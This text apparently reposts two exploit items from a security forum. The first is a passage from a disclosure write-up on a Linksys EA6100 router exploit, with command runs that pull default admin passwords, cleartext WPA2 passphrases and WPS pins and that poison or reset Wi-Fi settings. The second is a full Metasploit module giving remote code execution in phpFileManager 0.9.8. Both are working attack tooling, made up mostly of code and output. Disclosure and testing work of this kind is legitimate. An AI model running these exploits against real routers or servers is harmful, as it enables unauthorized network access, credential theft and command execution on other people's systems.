target wireless SSID and cleartext password --isdefault Check if target is running the default admin credential (if yes, obtain passphrase) --resetwifi Reset the access point security (requires default passphrase) --poisonwifi Poison the access point security settings --getwpspin Get the WPS pin for the target he switches above and their corresponding description convey the functionality built into our exploit. The first is --isdefault which works by sending the access point management interface a JNAP action over HTTP. The JNAP functionality within the EA series access points has been discussed previously; see for example https://github.com/Qanan/Linksys-JNAP-Siphon This tool does indeed siphon out some interesting information, even information that is redundant to what we obtain through separate methods. While it used to be quite popular for the default admin account in these types of devices to just be admin/admin we found that is no longer the case for the EA series. Instead we found a (seemingly) random password on the label for our hardware. We didn't look, but lets just hope it isn't based on the serial number of the device or any other predicatable value really. So, what does --isdefault do? It sends an HTTP request to the access point with a header name X-JNAP-Action whose value is a URL. Example: 404 Page Not Found The access point will return an HTTP 200 with a JSON string. The string contains a key named 'output' which also contains a JSON value. This value has a key named 'isAdminPasswordDefault' and contains a boolean indicating whether or not the password has been changed. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --isdefault Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Checking if administrator passphrase is default - [!] Passphrase is not default I changed the password, but what if I had not yet changed it? I mean, it's not admin/admin anymore so I should good right? Wrong. The access point will tell _anyone_ the default admin password regardless if it's set or not. In cases where isAdminPasswordDefault is True, the exploit will obtain the default password in clear text. You'll see this in action later on. What about getting access to the wireless network? Well, there are a few options. If you don't mind cracking hashes then --getpwhash will make an HTTP call to the access point at getstinfo.cgi which will then return the values shown below. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getpwhash Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Obtaining wireless password hash - SSID=[redacted] Passphrase=[redacted] What if you want to use WPS instead? No problem, just run --getwpspin. This makes an HTTP call to sysinfo.cgi and then parses the response for the value. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getwpspin Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Getting WPS pin - WPS PIN: [redacted] If you don't want to use any of those or maybe you just want the WPA2 password, you can use --getclearpw. This also makes a HTTP call to sysinfo.cgi, except this will search for the wireless security settings which are stored in cleartext. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getclearpw Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Obtaining wireless ssid and password - wl0 Passphrase: [redacted] wl0 SSID: [redacted] wl1 Passphrase: [redacted] wl1 SSID: [redacted] If you're looking for a "poison the well" type attack, then --poisonwifi is for you. This switch makes an HTTP call that will reconfigure NVRAM so the next time a change is applied your poisoned wireless settings will also get applied. Once the HTTP call to poison the settings has taken place, the exploit will call --getclearpw and search for your poisoned settings to ensure poisoning has taken place. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --poisonwifi Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Poisoning wireless ssid configuration [+] Access point ssid settings poisoned. An administrator will need to hit Apply anywhere in the UI Say stealth doesn't matter and this attack vector is still your best shot for some reason, if --isdefault is True the exploit can automatically reconfigure the wireless settings for quick network access. Using the switch --resetwifi will run --isdefault and if it returns True, it will then run a separate JNAP action that will perform the reconfiguration. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --resetwifi Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Resetting the access point security [+] Admin password is default, asking for the password [+] Got the passphrase: [redacted] [+] AP will now restart with the SSID and passphrase: korelogic/korelogic and korelogic2/korelogic2 Sursa: https://blog.korelogic.com/blog/2015/12/04/linksys-0day-unauth-infodisco.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'phpFileManager 0.9.8 Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in phpFileManager 0.9.8 which is a filesystem management tool on a single file. }, 'License' => MSF_LICENSE, 'Author' => [ 'hyp3rlinx', # initial discovery 'Jay Turla' # msf ], 'References' => [ [ 'EDB', '37709' ], [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website ], 'Privileged' => false, 'Payload' => { 'Space' => 2000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Platform' => %w{ unix win }, 'Arch' => ARCH_CMD, 'Targets' => [ ['phpFileManager / Unix', { 'Platform' => 'unix' } ], ['phpFileManager / Windows', { 'Platform' => 'win' } ] ], 'DisclosureDate' => 'Aug 28 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']), ],self.class) end def check txt = Rex::Text.rand_text_alpha(8) res = http_send_command("echo #{txt}") if res && res.body =~ /#{txt}/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def push uri = normalize_uri(target_uri.path) # To push the Enter button res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'frame' => '3', 'pass' => '' # yep this should be empty } }) if res.nil? vprint_error("#{peer} - Connection timed out") fail_with(Failure::Unknown, "Failed to trigger the Enter button") end if res && res.headers && res.code == 302 print_good("#{peer} - Logged in to the file manager") cookie = res.get_cookies cookie else fail_with(Failure::Unknown, "#{peer} - Error entering the file manager") end end def http_send_command(cmd) cookie = push res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookie, 'vars_get' => { 'action' => '6', 'cmd' => cmd } }) unless res && res.code == 200 fail_with(Failure::Unknown, "Failed to execute the command.") end res end def exploit http_send_command(payload.encoded) end end Sursa: https://www.exploit-db.com/exploits/38900/.